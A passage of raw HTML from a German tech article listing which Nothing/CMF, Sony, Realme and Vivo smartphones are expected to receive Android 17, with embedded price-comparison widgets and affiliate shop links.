						<span>484,70 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=0ooTOk5YCN0Vf28VzW0Dp4eF8ZBoGX1q25VjufAGN321g7_hVoNHUkNR6XImhoGB4kZKpwcYI7dcxFuC2QtpVlm9TTwaD3QnDedh1yRrcs2SlYNCzDNcK5pT31QxUCj5_Jy4HCy7jhQJO-b31T0VW8&amp;mid=685794725996&amp;id=685794725996&amp;ts=20260618&amp;log=rss" data-vars-product-name="Motorola Edge 70" data-vars-product-id="2969341" data-vars-category="Mid-range smartphones" data-vars-manufacturer-id="10019" data-vars-manufacturer="Motorola" data-vars-vendor="billiger,amazon,gtin,mpn,Motorola" data-vars-po="billiger,amazon,gtin,mpn" data-product="2969341" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=0ooTOk5YCN0Vf28VzW0Dp4eF8ZBoGX1q25VjufAGN321g7_hVoNHUkNR6XImhoGB4kZKpwcYI7dcxFuC2QtpVlm9TTwaD3QnDedh1yRrcs2SlYNCzDNcK5pT31QxUCj5_Jy4HCy7jhQJO-b31T0VW8&amp;mid=685794725996&amp;id=685794725996&amp;ts=20260618&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="484,70 €" data-vars-product-vendor="OTTO" aria-label="Deal anschauen bei OTTO für 484,70 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__hidden-records-wrapper">
									<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/10729.png" alt="expert TechnoMarkt" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>629,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=YzxInn91D91RDMrEUYsO-mQnNIX1NRd4EhQVZZd5KNT5p11Pk4U7aXy7k3EX0blZokZKpwcYI7dcxFuC2QtpVnSc2NQCIo16SffqMmBoYgZBn4uyyYMND4n0AtweNGU7w&amp;mid=685718974030&amp;id=685718974030&amp;ts=20260618&amp;log=rss" data-vars-product-name="Motorola Edge 70" data-vars-product-id="2969341" data-vars-category="Mid-range smartphones" data-vars-manufacturer-id="10019" data-vars-manufacturer="Motorola" data-vars-vendor="billiger,amazon,gtin,mpn,Motorola" data-vars-po="billiger,amazon,gtin,mpn" data-product="2969341" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=YzxInn91D91RDMrEUYsO-mQnNIX1NRd4EhQVZZd5KNT5p11Pk4U7aXy7k3EX0blZokZKpwcYI7dcxFuC2QtpVnSc2NQCIo16SffqMmBoYgZBn4uyyYMND4n0AtweNGU7w&amp;mid=685718974030&amp;id=685718974030&amp;ts=20260618&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="629,00 €" data-vars-product-vendor="expert TechnoMarkt" aria-label="Deal anschauen bei expert TechnoMarkt für 629,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/15554.png" alt="Proshop.de" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>799,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=Swrd8EwUigUXVSmyu4TSBO3QKcigQmkges28yFjmDxaigJs7LnKJLhejOOf5eEjiVKfpa4qJRMyQg2cqzA_6OqxW8IPYfl_ysAszGJUFjxwnAFdJOw8W1_ij4zEsGsvjgrdTR5qeKtym-2C0mWzvbw&amp;mid=685701612771&amp;id=685701612771&amp;ts=20260618&amp;log=rss" data-vars-product-name="Motorola Edge 70" data-vars-product-id="2969341" data-vars-category="Mid-range smartphones" data-vars-manufacturer-id="10019" data-vars-manufacturer="Motorola" data-vars-vendor="billiger,amazon,gtin,mpn,Motorola" data-vars-po="billiger,amazon,gtin,mpn" data-product="2969341" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=Swrd8EwUigUXVSmyu4TSBO3QKcigQmkges28yFjmDxaigJs7LnKJLhejOOf5eEjiVKfpa4qJRMyQg2cqzA_6OqxW8IPYfl_ysAszGJUFjxwnAFdJOw8W1_ij4zEsGsvjgrdTR5qeKtym-2C0mWzvbw&amp;mid=685701612771&amp;id=685701612771&amp;ts=20260618&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="799,00 €" data-vars-product-vendor="Proshop.de" aria-label="Deal anschauen bei Proshop.de für 799,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<span>Motorola</span>
													</div>
												<div class="price-comparison__price ">
						<span>799,99 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://www.motorola.com/de/de/p/phones/motorola-edge/motorola-edge-70/pmipmjc43m9" data-vars-product-name="Motorola Edge 70" data-vars-product-id="2969341" data-vars-category="Mid-range smartphones" data-vars-manufacturer-id="10019" data-vars-manufacturer="Motorola" data-vars-vendor="billiger,amazon,gtin,mpn,Motorola" data-vars-po="billiger,amazon,gtin,mpn" data-product="2969341" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://www.motorola.com/de/de/p/phones/motorola-edge/motorola-edge-70/pmipmjc43m9" data-vars-product-price="799,99 €" data-vars-product-vendor="Motorola" aria-label="Deal anschauen bei Motorola für 799,99 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
						
									</div>
									<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
													Preisvergleich (über 24.000 Shops weltweit)												</span>
											<button class="price-comparison__view-more-button">
							Weitere Angebote						</button>
									</div>
		</div>

		<div class="refurbished_products_tab tabcontent">
			<div class="refurbished-padding price-comparison__record price-comparison__record--header">
				<div>
					<span>Produkt</span>
				</div>
				<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>
							<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
					Preisvergleich von Backmarket						</span>
									</div>
		</div>
		</div>
		


<h2 class="wp-block-heading">Nothing / CMF</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a3397cf4034e"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/03/Nothing-Phone-4a-Pro-7.jpeg?quality=50&amp;strip=all&amp;w=1200" alt="Nothing Phone 4a Pro 7" class="wp-image-3093077" width="1200" height="675" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Jon Mundy / Foundry</p></div>



<p>Der Hersteller Nothing beziehungsweise CMF geht beim Design seiner Smartphones zwar einen eigenwilligen Weg, hält sich bei der Angabe verfügbarer Android-Updates aber an ein klares Prinzip. Alle Modelle erhalten mindestens drei große Android-Updates:</p>



<ul class="wp-block-list">
<li><a href="https://www.pcwelt.de/article/3089770/nothing-phone-4a-test.html" target="_blank" rel="noreferrer noopener">Phone 4a</a></li>



<li><a href="https://www.pcwelt.de/article/3099920/nothing-phone-4a-pro-test-2.html" target="_blank" rel="noreferrer noopener">Phone 4a Pro</a></li>



<li><a href="https://www.pcwelt.de/article/2633627/nothing-phone-3a-test.html" target="_blank" rel="noreferrer noopener">Phone 3a</a></li>



<li><a href="https://www.pcwelt.de/article/2633499/nothing-phone-3a-pro-hands-on.html" target="_blank" rel="noreferrer noopener">Phone 3a Pro</a></li>



<li><a href="https://www.pcwelt.de/article/2002927/nothing-phone-2-test.html" target="_blank" rel="noreferrer noopener">Phone (2)</a></li>



<li><a href="https://www.pcwelt.de/article/2259040/nichts-telefon-2a-test.html" target="_blank" rel="noreferrer noopener">Phone 2a</a></li>



<li><a href="https://www.pcwelt.de/article/2425610/nothing-phone-2a-test.html" target="_blank" rel="noreferrer noopener">Phone 2a Plus</a></li>



<li><a href="https://www.pcwelt.de/article/2768762/cmf-phone-2-pro-test.html" target="_blank" rel="noreferrer noopener">CMF Phone 2 Pro</a></li>
</ul>



<p><strong>Kein Android 17 mehr:</strong> Nothing Phone (1), CMF Phone 1.</p>



<p><strong>Nothing Phone 4a im Preisvergleich</strong></p>



				<div class="wp-block-price-comparison price-comparison">
		
		<div class="new_products_tab tabcontent ">

			<div class="price-comparison__record price-comparison__record--header">
				<div>
					<span>Shop</span>
				</div>
								<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>

								<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/934.png" alt="baur.de" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>349,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=iAIOaqIXfyfVf28VzW0Dp4eF8ZBoGX1q1h1phuB-jTR1g7_hVoNHUkzJ7qk5fi_BFKfpa4qJRMyFpBa9FdUkCCwPDT8AJsGUw2V-OBS6X81SacX3_ODkWoCBtFGaKvpZjRUCfbgq_BWAZJDmuINrRwl0EGfRgUmYznRzjb2RSOS&amp;mid=686123691126&amp;id=686123691126&amp;ts=20260618&amp;log=rss" data-vars-product-name="Nothing Phone (4a)" data-vars-product-id="3084724" data-vars-category="Mid-range smartphones" data-vars-manufacturer-id="20418" data-vars-manufacturer="Nothing" data-vars-vendor="amazon,billiger,gtin,mpn,Nothing" data-vars-po="amazon,billiger,gtin,mpn" data-product="3084724" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=iAIOaqIXfyfVf28VzW0Dp4eF8ZBoGX1q1h1phuB-jTR1g7_hVoNHUkzJ7qk5fi_BFKfpa4qJRMyFpBa9FdUkCCwPDT8AJsGUw2V-OBS6X81SacX3_ODkWoCBtFGaKvpZjRUCfbgq_BWAZJDmuINrRwl0EGfRgUmYznRzjb2RSOS&amp;mid=686123691126&amp;id=686123691126&amp;ts=20260618&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="349,00 €" data-vars-product-vendor="baur.de" aria-label="Deal anschauen bei baur.de für 349,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<span>Nothing</span>
													</div>
												<div class="price-comparison__price ">
						<span>349,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://www.awin1.com/cread.php?awinmid=48017&amp;awinaffid=486277&amp;clickref=rss&amp;platform=dl&amp;ued=https://de.nothing.tech/products/phone-4a" data-vars-product-name="Nothing Phone (4a)" data-vars-product-id="3084724" data-vars-category="Mid-range smartphones" data-vars-manufacturer-id="20418" data-vars-manufacturer="Nothing" data-vars-vendor="amazon,billiger,gtin,mpn,Nothing" data-vars-po="amazon,billiger,gtin,mpn" data-product="3084724" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://www.awin1.com/cread.php?awinmid=48017&amp;awinaffid=486277&amp;clickref=rss&amp;platform=dl&amp;ued=https://de.nothing.tech/products/phone-4a" data-vars-product-price="349,00 €" data-vars-product-vendor="Nothing" aria-label="Deal anschauen bei Nothing für 349,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/3667.png" alt="OTTO" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>349,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=azoguGva3Degvrhhe5GGHdSkzWVq7p-uNVErWYGn16Jk_4BwBhYN2q6BZ-N7lfpxZjSGCy28nozu7Lge72st2rJBOkIB5Xcerjbd2SezuqyN-biuHJl385X-Mj7TASBB_Jy4HCy7jhQJO-b31T0VW8&amp;mid=686242461246&amp;id=686242461246&amp;ts=20260618&amp;log=rss" data-vars-product-name="Nothing Phone (4a)" data-vars-product-id="3084724" data-vars-category="Mid-range smartphones" data-vars-manufacturer-id="20418" data-vars-manufacturer="Nothing" data-vars-vendor="amazon,billiger,gtin,mpn,Nothing" data-vars-po="amazon,billiger,gtin,mpn" data-product="3084724" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=azoguGva3Degvrhhe5GGHdSkzWVq7p-uNVErWYGn16Jk_4BwBhYN2q6BZ-N7lfpxZjSGCy28nozu7Lge72st2rJBOkIB5Xcerjbd2SezuqyN-biuHJl385X-Mj7TASBB_Jy4HCy7jhQJO-b31T0VW8&amp;mid=686242461246&amp;id=686242461246&amp;ts=20260618&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="349,00 €" data-vars-product-vendor="OTTO" aria-label="Deal anschauen bei OTTO für 349,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  amazon_vendor">
						<div class="price-comparison__image">
															<img decoding="async" src="https://www.pcwelt.de/wp-content/themes/idg-base-theme/dist/static/img/amazon-logo.svg" alt="Amazon" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>389,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://www.amazon.de/dp/B0GHNXX9WY?tag=pcwelt.de-21&amp;linkCode=ogi&amp;th=1&amp;psc=1&amp;ascsubtag=rss" data-vars-product-name="Nothing Phone (4a)" data-vars-product-id="3084724" data-vars-category="Mid-range smartphones" data-vars-manufacturer-id="20418" data-vars-manufacturer="Nothing" data-vars-vendor="amazon,billiger,gtin,mpn,Nothing" data-vars-po="amazon,billiger,gtin,mpn" data-product="3084724" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://www.amazon.de/dp/B0GHNXX9WY?tag=pcwelt.de-21&amp;linkCode=ogi&amp;th=1&amp;psc=1&amp;ascsubtag=rss" data-vendor-api="amazon" data-vars-product-price="389,00 €" data-vars-product-vendor="Amazon" aria-label="Deal anschauen bei Amazon für 389,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
						
								<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
													Preisvergleich (über 24.000 Shops weltweit)												</span>
									</div>
		</div>

		<div class="refurbished_products_tab tabcontent">
			<div class="refurbished-padding price-comparison__record price-comparison__record--header">
				<div>
					<span>Produkt</span>
				</div>
				<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>
							<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
					Preisvergleich von Backmarket						</span>
									</div>
		</div>
		</div>
		


<h2 class="wp-block-heading">Sony</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a3397cf44f7f"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/07/Sony-Xperia-1-VII-review-13.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Sony Xperia 1 VII review 13" class="wp-image-2864514" width="1200" height="674" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Luke Baker</p></div>



<p>Sony kommuniziert besonders transparent, welche Smartphones noch Android-Updates erhalten. Daher ist die Liste hier sehr verlässlich.</p>



<p>Diese Geräte bekommen Android 17:</p>



<ul class="wp-block-list">
<li>Xperia 10 VII</li>



<li>Xperia 10 VI</li>



<li><a href="https://www.pcwelt.de/article/3007641/sony-xperia-1-vii-test.html" target="_blank" rel="noreferrer noopener">Xperia 1 VII</a></li>



<li>Xperia 1 VI</li>
</ul>



<p><strong>Kein Update auf Android 17:</strong> Xperia 1 IV, Xperia 1 V, Xperia 5 IV, Xperia 5 V, Xperia 10 V.</p>



<p><strong>Sony Xperia 1 VII im Preisvergleich</strong></p>



				<div class="wp-block-price-comparison price-comparison">
		
		<div class="new_products_tab tabcontent ">

			<div class="price-comparison__record price-comparison__record--header">
				<div>
					<span>Shop</span>
				</div>
								<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>

								<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<span>Sony</span>
													</div>
												<div class="price-comparison__price ">
						<span>1.499,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://www.sony.de/smartphones/products/xperia-1m7" data-vars-product-name="Sony Xperia 1 VII" data-vars-product-id="2815293" data-vars-category="Smartphones" data-vars-manufacturer-id="10057" data-vars-manufacturer="Sony" data-vars-vendor="amazon,Sony" data-vars-po="amazon" data-product="2815293" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://www.sony.de/smartphones/products/xperia-1m7" data-vars-product-price="1.499,00 €" data-vars-product-vendor="Sony" aria-label="Deal anschauen bei Sony für 1.499,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
						
								<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
													Preisvergleich (über 24.000 Shops weltweit)												</span>
									</div>
		</div>

		<div class="refurbished_products_tab tabcontent">
			<div class="refurbished-padding price-comparison__record price-comparison__record--header">
				<div>
					<span>Produkt</span>
				</div>
				<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>
							<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
					Preisvergleich von Backmarket						</span>
									</div>
		</div>
		</div>
		


<h2 class="wp-block-heading">Realme</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a3397cf4e161"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/09/PXL_20250904_104601692.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Realme GT 7 Dream Editon skärm" class="wp-image-2901166" width="1200" height="675" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Mattias Inghe</p></div>



<p>Der chinesische Hersteller Realme macht keine allzu genauen Angaben zu kommenden Updates, liefert aber voraussichtlich Android 17 auch an folgende Modelle aus:</p>



<ul class="wp-block-list">
<li>Realme 16 / Pro / Pro+</li>



<li>Realme 15 / 15T / Pro </li>



<li>Realme 14 / 14 T/ Pro / Pro+</li>



<li>Realme 13 / 13T/ Pro / Pro+</li>



<li>P4 / P4 Pro</li>



<li>Realme GT 8 / <a href="https://www.pcwelt.de/article/3056055/realme-gt-8-pro-test.html" target="_blank" rel="noreferrer noopener">Pro</a></li>



<li>Realme GT 7 / 7T / Pro</li>



<li>Realme GT 6 / 6T / Pro</li>
</ul>



<p><strong>Eher kein Android 17:</strong> Realme GT Neo 5, GT Neo 3.</p>



<p><strong>Realme GT8 Pro im Preisvergleich</strong></p>



				<div class="wp-block-price-comparison price-comparison">
		
		<div class="new_products_tab tabcontent ">

			<div class="price-comparison__record price-comparison__record--header">
				<div>
					<span>Shop</span>
				</div>
								<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>

								<div class="price-comparison__record  amazon_vendor">
						<div class="price-comparison__image">
															<img decoding="async" src="https://www.pcwelt.de/wp-content/themes/idg-base-theme/dist/static/img/amazon-logo.svg" alt="Amazon" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>889,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://www.amazon.de/dp/B0FRF5YQ86?tag=pcwelt.de-21&amp;linkCode=ogi&amp;th=1&amp;psc=1&amp;ascsubtag=rss" data-vars-product-name="Realme GT8 Pro" data-vars-product-id="2997169" data-vars-category="Smartphones" data-vars-manufacturer-id="20716" data-vars-manufacturer="Realme" data-vars-vendor="billiger,gtin,amazon,mpn," data-vars-po="billiger,gtin,amazon,mpn" data-product="2997169" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://www.amazon.de/dp/B0FRF5YQ86?tag=pcwelt.de-21&amp;linkCode=ogi&amp;th=1&amp;psc=1&amp;ascsubtag=rss" data-vendor-api="amazon" data-vars-product-price="889,00 €" data-vars-product-vendor="Amazon" aria-label="Deal anschauen bei Amazon für 889,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/15554.png" alt="Proshop.de" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.099,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=UkJ8ChwNQIHRDMrEUYsO-lVt6WZAp33cQ4j59AJG0lZ1g7_hVoNHUk8tZGB_C9SE6I4j3j7iWFlrUuujWQ6tV0QG3hB2yttjos5z0-TRl3wiGAL2rwUZdU6UbQhTdBmv22jqWFOTG_V&amp;mid=685845173703&amp;id=685845173703&amp;ts=20260618&amp;log=rss" data-vars-product-name="Realme GT8 Pro" data-vars-product-id="2997169" data-vars-category="Smartphones" data-vars-manufacturer-id="20716" data-vars-manufacturer="Realme" data-vars-vendor="billiger,gtin,amazon,mpn," data-vars-po="billiger,gtin,amazon,mpn" data-product="2997169" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=UkJ8ChwNQIHRDMrEUYsO-lVt6WZAp33cQ4j59AJG0lZ1g7_hVoNHUk8tZGB_C9SE6I4j3j7iWFlrUuujWQ6tV0QG3hB2yttjos5z0-TRl3wiGAL2rwUZdU6UbQhTdBmv22jqWFOTG_V&amp;mid=685845173703&amp;id=685845173703&amp;ts=20260618&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="1.099,00 €" data-vars-product-vendor="Proshop.de" aria-label="Deal anschauen bei Proshop.de für 1.099,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
						
								<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
													Preisvergleich (über 24.000 Shops weltweit)												</span>
									</div>
		</div>

		<div class="refurbished_products_tab tabcontent">
			<div class="refurbished-padding price-comparison__record price-comparison__record--header">
				<div>
					<span>Produkt</span>
				</div>
				<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>
							<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
					Preisvergleich von Backmarket						</span>
									</div>
		</div>
		</div>
		


<h2 class="wp-block-heading">Vivo</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a3397cf5362d"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/10/Vivo-X300-Pro-hands-on-2.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Vivo X300 Pro hands on 2" class="wp-image-2941609" width="1200" height="674" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Luke Baker</p></div>



<p>Der chinesische Smartphone-Hersteller Vivo kann eine Vielzahl von Modellen vorweisen, und einige davon bekommen voraussichtlich auch das Update auf Android 17:</p>



<ul class="wp-block-list">
<li><a href="https://www.pcwelt.de/article/3145865/vivo-x300-ultra-test.html" target="_blank" rel="noreferrer noopener">Vivo X300</a> / Pro / Ultra / FE</li>



<li>Vivo X200 / X200T Pro / FE </li>



<li>Vivo X100 / Pro</li>



<li>Vivo X Fold 5</li>



<li>Vivo X Fold 3 Pro</li>



<li>Vivo V70 / FE / Elite</li>



<li>Vivo V60 / V60e / V60 Lite </li>



<li>Vivo V50 / V50e / Lite </li>



<li>Vivo V40 / Pro</li>



<li>Vivo T4 / Pro / Ultra / Lite / T4x / T4R</li>



<li>Vivo Y400 / Pro / Pro+</li>



<li>Vivo Y300 GT / Y300t / Y300i</li>



<li>Vivo Y51 Pro</li>



<li>Vivo Y31d 4G</li>



<li>Vivo Y21 (2026)</li>



<li>Vivo Y11 (2026)</li>



<li>Vivo Y05 4G</li>



<li>Vivo Y29s 5G</li>
</ul>



<p><strong>Vivo X300 Pro im Preisvergleich</strong></p>



				<div class="wp-block-price-comparison price-comparison">
		
		<div class="new_products_tab tabcontent ">

			<div class="price-comparison__record price-comparison__record--header">
				<div>
					<span>Shop</span>
				</div>
								<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>

								<div class="price-comparison__record  amazon_vendor">
						<div class="price-comparison__image">
															<img decoding="async" src="https://www.pcwelt.de/wp-content/themes/idg-base-theme/dist/static/img/amazon-logo.svg" alt="Amazon" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>9.999,00 €</span>						</div>
						<div>
